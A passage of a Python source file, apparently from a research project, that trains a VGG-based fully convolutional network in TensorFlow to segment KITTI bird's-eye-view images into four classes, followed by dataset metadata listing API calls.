tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. 
Build skip-layers using the vgg layers.\n    :param vgg_layer7_out: TF Tensor for VGG Layer 7 output\n    :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n    :param vgg_layer3_out: TF Tensor for VGG Layer 3 output\n    :param num_classes: Number of classes to classify\n    :return: The Tensor for the last layer of output\n    \"\"\"\n    # TODO: Implement function\n    # 1x1 convolution of vgg layer 7\n    layer7a_out = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, \n                                   padding= 'same', \n                                   kernel_initializer= tf.random_normal_initializer(stddev=0.01),\n                                   kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    # upsample\n    layer4a_in1 = tf.layers.conv2d_transpose(layer7a_out, num_classes, 4, \n                                             strides= (2, 2), \n                                             padding= 'same', \n                                             kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n                                             kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    # make sure the shapes are the same!\n    # 1x1 convolution of vgg layer 4\n    layer4a_in2 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, \n                                   padding= 'same', \n                                   kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n                                   kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    # skip connection (element-wise addition)\n    layer4a_out = tf.add(layer4a_in1, layer4a_in2)\n    # upsample\n    layer3a_in1 = tf.layers.conv2d_transpose(layer4a_out, num_classes, 4, \n                                             strides= (2, 2), \n                                             padding= 'same', \n                                             kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n                                             kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    # 1x1 convolution of vgg layer 3\n    layer3a_in2 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, \n                                   padding= 'same', \n                                   kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n                                   kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    # skip connection (element-wise addition)\n    layer3a_out = tf.add(layer3a_in1, layer3a_in2)\n    # upsample (2 * 2 * 8 = 32x in total, undoing VGG's 1/32 downsampling)\n    nn_last_layer = tf.layers.conv2d_transpose(layer3a_out, num_classes, 16, \n                                               strides= (8, 8), \n                                               padding= 'same', \n                                               kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n                                               kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n    return nn_last_layer\n#tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n    \"\"\"\n    Build the TensorFlow loss and optimizer operations.\n    :param nn_last_layer: TF Tensor of the last layer in the neural network\n    :param correct_label: TF Placeholder for the correct label image\n    :param learning_rate: TF Placeholder for the learning rate\n    :param num_classes: Number of classes to classify\n    :return: Tuple of (logits, train_op, cross_entropy_loss)\n    \"\"\"\n    # TODO: Implement function\n    # make logits a 2D tensor where each row represents a pixel and each column a class\n    logits = tf.reshape(nn_last_layer, (-1, num_classes))\n    correct_label = tf.reshape(correct_label, (-1,num_classes))\n    # define loss function\n\n    #cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits= logits, labels= correct_label))\n    cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits= logits, labels= correct_label))\n    # define training operation\n    optimizer = tf.train.AdamOptimizer(learning_rate= learning_rate)\n    train_op = optimizer.minimize(cross_entropy_loss)\n\n    return logits, train_op, cross_entropy_loss\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator,seed):\n    \"\"\"\n    Train neural network and print out the loss during training.\n    :param sess: TF
Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n next_element = iterator.get_next()\n sess.run(tf.global_variables_initializer())\n \n print(\"Training...\")\n #print()\n for i in range(epochs):\n #sess.run(iterator.initializer)\n print(\"EPOCH {} ...\".format(i+1))\n #for image, label in get_batches_fn(batch_size):\n #for i in batch_size:\n # _, loss = sess.run([train_op, cross_entropy_loss], \n # feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n # print(\"Loss: = {:.3f}\".format(loss))\n #images = []\n #gt_images = []\n # Compute for 100 epochs.\n\n #sess.run(iterator.initializer)\n sess.run(iterator.initializer, feed_dict={seed: i})\n\n while True:\n try:\n image,label = sess.run(next_element)\n\n #print(\"build batch\")\n\n #print('image',image)\n #print('shape',image[0].shape)\n #print('label',label[0].shape)\n #images.append(image)\n #gt_images.append(label[0])\n #print(len(image))\n #print(len(label))\n\n except tf.errors.OutOfRangeError:\n break\n #images_np = np.array(images)\n #gt_images_np = np.array(gt_images)\n #print('shape images',images_np.shape)\n #print('shape images',images_np.shape)\n #print('loss')\n _, loss = sess.run([train_op, cross_entropy_loss], feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n ##########\n print(\"Loss: = {:.5f}\".format(loss))\n\n\n\n\n\n#tests.test_train_nn(train_nn)\n\n# background_color = np.array([255, 0, 0])\n\n# def _parse_function(filename, label):\n# print('file',filename)\n# print('label',label)\n# image_shape = (160, 576)\n \n# image_string = tf.read_file(filename)\n# image_decoded = tf.image.decode_png(image_string)\n# #image_resized = tf.image.resize_images(image_decoded, [4, 4])\n# image_resized = tf.image.resize_images(image_decoded, image_shape)\n\n# label_string = tf.read_file(label)\n# label_decoded = tf.image.decode_png(label_string)\n# label_resized = tf.image.resize_images(label_decoded, image_shape)\n\n# print('label', label_resized)\n# print('background_color',background_color)\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #images.append(image)\n# #gt_images.append(gt_image)\n# return image_resized, gt_image\n\n# def _read_resize_py_function(filename, label):\n# background_color = np.array([255, 0, 0])\n# image_shape = (160, 576)\n# # image_shape = (40, 128)\n# #image_decoded = cv2.imread(filename.decode(), cv2.IMREAD_GRAYSCALE)\n# #image_decoded = cv2.imread(filename.decode())\n# #print(filename.decode())\n# image_decoded = io.imread(filename.decode())\n# #print('hello')\n# #print(image_decoded.shape )\n# #print(image_decoded)\n# image_resized = resize(image_decoded, image_shape)\n\n# label_decoded = io.imread(label.decode())\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, 
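train_nn drives an initializable iterator: it re-runs iterator.initializer each epoch with the epoch index fed as the shuffle seed, then treats tf.errors.OutOfRangeError as the end-of-epoch signal. Reduced to its skeleton (run_epochs and train_step are my names; the control flow matches the loop above):

import tensorflow as tf

def run_epochs(sess, epochs, iterator, next_element, seed_ph, train_step):
    # Same pattern as train_nn above, with the per-batch work factored out.
    for epoch in range(epochs):
        # Re-initialize with a new seed so every epoch shuffles differently.
        sess.run(iterator.initializer, feed_dict={seed_ph: epoch})
        while True:
            try:
                image, label = sess.run(next_element)
            except tf.errors.OutOfRangeError:
                break  # dataset exhausted: the epoch is done
            train_step(image, label)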
axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# return image_resized, gt_image\n\n\n\n# def _read_resize_py_function(filename):\n\n# background_color = np.array([255, 0, 0])\n\n# image_shape = (160, 576)\n\n# folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n# image_decoded = io.imread(folder_img+\"/\"+filename.decode())\n# print(folder_img+\"/\"+filename.decode())\n# image_resized = resize(image_decoded, image_shape)\n# #print(\"dataset\", folder_img+\"/\"+filename.decode())\n# filename_gt = re.sub(r'(?is)_', '_road_', filename.decode())\n# folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n# label_decoded = io.imread(folder_gt+\"/\"+filename_gt)\n# print(folder_gt+\"/\"+filename_gt)\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# #return image_resized, gt_image\n# return image_resized, gt_image\n\ndef blockshaped(arr, nrows, ncols):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (n, nrows, ncols) where\n n * nrows * ncols = arr.size\n\n If arr is a 2D array, the returned array looks like n subblocks with\n each subblock preserving the \"physical\" layout of arr.\n \"\"\"\n h, w = arr.shape\n return (arr.reshape(h//nrows, nrows, -1, ncols)\n .swapaxes(1,2)\n .reshape(-1, nrows, ncols))\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\n\n\n\n\ndef depth_read(filename, left, right, top, bottom):\n # loads depth map D from png file\n # and returns it as a numpy array,\n # for details see readme.txt\n #depth_png = np.array(Image.open(filename), dtype=int)#####no rezize\n depth_png = Image.open(filename)\n cropped = depth_png.crop( ( left, top, right, bottom ) ) # size: 576 X 160\n #cropped.show()\n depth_png = np.array(cropped, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n assert(np.max(depth_png) > 255)\n depth = depth_png.astype(np.float) / 256.\n depth = np.uint8(depth)\n #depth_png = depth_png.resize(new_size)\n #depth_png = np.array(depth_png, dtype=int)\n # make sure we have a proper 16bit depth map here.. 
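blockshaped and unblockshaped are exact inverses whenever nrows and ncols divide the array's dimensions; a quick round-trip check, assuming the two functions above are in scope:

import numpy as np

a = np.arange(24).reshape(4, 6)
tiles = blockshaped(a, 2, 3)           # shape (4, 2, 3): four 2x3 sub-blocks
restored = unblockshaped(tiles, 4, 6)  # inverse operation
assert tiles.shape == (4, 2, 3)
assert np.array_equal(a, restored)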
not 8bit!\n #depth_png.show()\n #assert(np.max(depth_png) > 255)\n #depth = depth_png.astype(np.float) / 256.\n #depth[depth_png == 0] = -1.\n #depth = normalize(depth)\n #depth = np.uint8(depth)\n return depth\n\n\n\n\n\n\n\n\ndef _read_resize_py_function(filename):\n\n #background_color = np.array([0, 0, 255])\n background_color = np.array([0, 0, 0])\n r_color = np.array([255, 0, 0])#scipy.misc\n g_color = np.array([0, 255, 0])#scipy.misc\n b_color = np.array([0, 0, 255])#scipy.misc\n\n\n image_shape = (576,160)\n new_size =(576,160)\n width_d, height_d = 1242,375\n #width = width_d-576\n width = width_d-new_size[0]\n #height = height_d-160\n height = height_d-new_size[1]\n th_sky = 135 #threshold crop the sky\n left = random.randint(0, width) \n top = random.randint(th_sky, height)\n right, bottom = left+new_size[0], top+new_size[1]\n #image_arr = depth_read(filename, left, right, top, bottom)\n\n #folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n\n #image_decoded = scipy.misc.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = cv2.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n image_decoded = Image.open(filename.decode(),mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n cropped = image_decoded.resize( new_size ) # size: 576 X 160\n image_resized = np.array(cropped)\n #print(image_resized.shape)\n\n\n #print(\"dataset\", folder_img+\"/\"+filename.decode())\n\n #print(\"orig\",np.max(image_resized),np.min(image_resized))\n\n\n#print(image_resized)\n a = [-128,-128,-128]\n image_norm = np.sum((image_resized,a),axis=0)\n #print(\"resta\",np.max(image_norm),np.min(image_norm))\n\n image_norm = np.divide(image_norm,128)\n #cropped.save(\"nn.png\")\n #image_norm.astype(np.float32)\n\n #print (image_norm)\n #print(\"norm\",np.max(image_norm),np.min(image_norm))\n\n\n filename_gt = re.sub(r'(?is)data/', 'gt/', filename.decode())\n\n # filename_gt = re.sub(r'(?is)kitti_raw/raw_data', 'depth_kitti/depth/depth_single_img/train', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_30/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_29/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_28/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_26/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_10_03/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)data/', '', filename_gt)\n #print(\"filename\",filename_gt)\n #folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n\n #label_decoded = scipy.misc.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = cv2.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = Image.open(folder_gt+\"/\"+filename_gt)\n #image_arr = depth_read(filename_gt,image_shape)\n # image_arr = depth_read(filename_gt, left, right, top, bottom)\n\n\n\n\n\n\n\n image_decodedgt = Image.open(filename_gt,mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n croppedgt = 
image_decodedgt.resize( new_size ) # size: 576 X 160\n\n\n\n label_resized= np.array(croppedgt)\n\n gt_bg = np.all(label_resized == background_color, axis=2)\n gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n\n gt_r = np.all(label_resized == r_color, axis=2)\n gt_r= gt_r.reshape(*gt_r.shape, 1)\n\n gt_g = np.all(label_resized == g_color, axis=2)\n gt_g = gt_g.reshape(*gt_g.shape, 1)\n\n gt_b = np.all(label_resized == b_color, axis=2)\n gt_b = gt_b.reshape(*gt_b.shape, 1)\n\n\n # gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n gt_image = np.concatenate((gt_bg, gt_r, gt_g, gt_b), axis=2)\n\n # print(\"shape image\",image_decoded.shape)\n # print(\"shape gt image\",gt_image.shape)\n\n ###############one hot########################\n # img_array = np.reshape(label_resized,(np.size(label_resized)))\n # one_hot = np.eye(4)[img_array]\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, 1242, 85)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n # 4 clases\n # one_hot =one_hot.reshape(160,576,4)\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n #print(one_hot_b.dtype)\n # one_hot_b = one_hot.astype(bool)\n\n\n\n\n #print(label_resized.shape)\n #print(\"show\")\n #label_decoded.show()\n #print (label_resized)\n #gt_bg = np.all(label_resized == background_color, axis=2)\n #print(gt_bg.shape)\n #print(gt_bg[0][0])\n #gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n #print(gt_bg[0][0])\n #gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n\n\n\n #one_hot_b = one_hot_b.astype(bool)\n # gt_image = one_hot_b\n #print(gt_image[100][100])\n #print(gt_image.shape)\n #print(\"max\",np.max(label_resized))\n #print(\"min\",np.min(label_resized))\n #print(\"gt max\",np.max(gt_image))\n #print(\"gt min\",np.max(gt_image))\n #return folder_img+\"/\"+filename.decode(), folder_gt+\"/\"+filename_gt\n #print(\"shape image\",image_decoded.shape)\n #print(\"shape gt image\",gt_image.shape)\n\n\n\n\n\n\n\n\n\n\n\n#######################################################\n # print(\"gt shape\",gt_image.shape)\n # print(\"image_norm\",image_norm.shape)\n#######################################################\n\n\n #print(\"gt\",gt_image)\n #print(\"ax2\",np.size(gt_image,axis=2))\n #print(\"ax1\",np.size(gt_image,axis=1))\n #print(\"ax0\",np.size(gt_image,axis=0))\n #return cropped, gt_image\n return image_norm, gt_image\n #return image_decoded,image_decoded\n\n\n\n\n# def input_pipeline(filenames, batch_size, num_shards, seed=None):\n# #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# dataset = (tf.data.TextLineDataset(filenames).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count()))#, cycle_length=5) \n# dataset = dataset.shuffle(buffer_size=10000, seed=seed)\n# #dataset = tf.data.TextLineDataset(filenames)\n# #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n# batched_dataset = dataset.batch(batch_size)\n# #dataset = 
tf.data.Dataset.from_tensor_slices((filenames, labels))\n# #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n# #dataset = dataset.shuffle(buffer_size=10000)\n# #batched_dataset = dataset.batch(batch_size)\n# #iterator = batched_dataset.make_one_shot_iterator()\n# #iterator = batched_dataset.make_initializable_iterator()\n# return batched_dataset.make_initializable_iterator()\n\ndef input_pipeline(filenames, batch_size, num_shards, seed=None):\n\n dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), \n num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.string, tf.string])), num_parallel_calls=2)), cycle_length=2) \n dataset = dataset.shuffle(buffer_size=4000, seed=seed)\n batched_dataset = dataset.batch(batch_size)\n\n return batched_dataset.make_initializable_iterator()\n\n\n\n\n\n\ndef run():\n #num_classes = 3\n #num_classes = 85\n num_classes = 4\n image_shape = (576,160)\n data_dir = '/home/shared/datasets/bird_eye_view/kitti/'\n runs_dir = './runs_bev_kitti'\n #filenames = [\"/home/shared/datasets/kitti_road/data_road/training/training.txt\"]\n #filenames_gt = [\"/home/shared/datasets/kitti_road/data_road/training/gt_training.txt\"]\n filenames = [\"/home/luis2r/Desktop/cnn-for-curb-segmentation/vgg_depth/trainin_bev_kitti_car_people_bici.txt\"]\n #filenames_gt = [\"/home/luis2r/rob_devkit/depth/KITTI/kitti_train_depth_maps.txt\"}\n # data_folder = \"/home/shared/datasets/kitti_road/data_road/training\"\n # filenames = glob(os.path.join(data_folder, 'image_2', '*.png'))\n # filenames = tf.constant(filenames)\n # labels = glob(os.path.join(data_folder, 'gt_image_2', '*_road_*.png'))\n # labels = tf.constant(labels)\n # print(labels)\n\n ########################################################### random.shuffle(filenames)\n\n #tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper2_bev.maybe_download_pretrained_vgg(data_dir)\n\n #epochs = 50\n epochs= 50\n batch_size = 32\n num_shards = 12\n #seed = None\n\n\n\n\n #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n\n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n\n #dataset = dataset.shuffle(buffer_size=10000, seed=20)\n\n\n #dataset = 
tf.data.TextLineDataset(filenames)\n #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n\n #batched_dataset = dataset.batch(batch_size)\n\n\n\n\n #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n #dataset = dataset.shuffle(buffer_size=10000)\n #batched_dataset = dataset.batch(batch_size)\n #iterator = batched_dataset.make_one_shot_iterator()\n #iterator = batched_dataset.make_initializable_iterator()\n \n seed = tf.placeholder(tf.int64, shape=())\n\n iterator = input_pipeline(filenames, batch_size, num_shards, seed)\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n\n #get_batches_fn = helper2.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n\n\n\n\n # TF placeholders\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n\n nn_last_layer = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(nn_last_layer, correct_label, learning_rate, num_classes)\n\n # TODO: Train NN using the train_nn function\n\n #train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate)\n train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator, seed)\n\n # TODO: Save inference data using helper2_bev_bev.save_inference_samples\n helper2_bev.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "vgg_depth/main_bev.py", "file_name": "main_bev.py", "file_ext": "py", "file_size_in_byte": 27222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "distutils.version.LooseVersion", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.__version__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 23, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.loader.load", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 47, "usage_type": "call"}, 
{"api_name": "tensorflow.get_default_graph", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 50, "usage_type": "call"}, {"api_name": "project_tests.test_load_vgg", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits_v2", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.nn", 
"line_number": 124, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 126, "usage_type": "attribute"}, {"api_name": "project_tests.test_optimize", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 321, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 321, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 365, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 366, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 376, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 376, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 396, 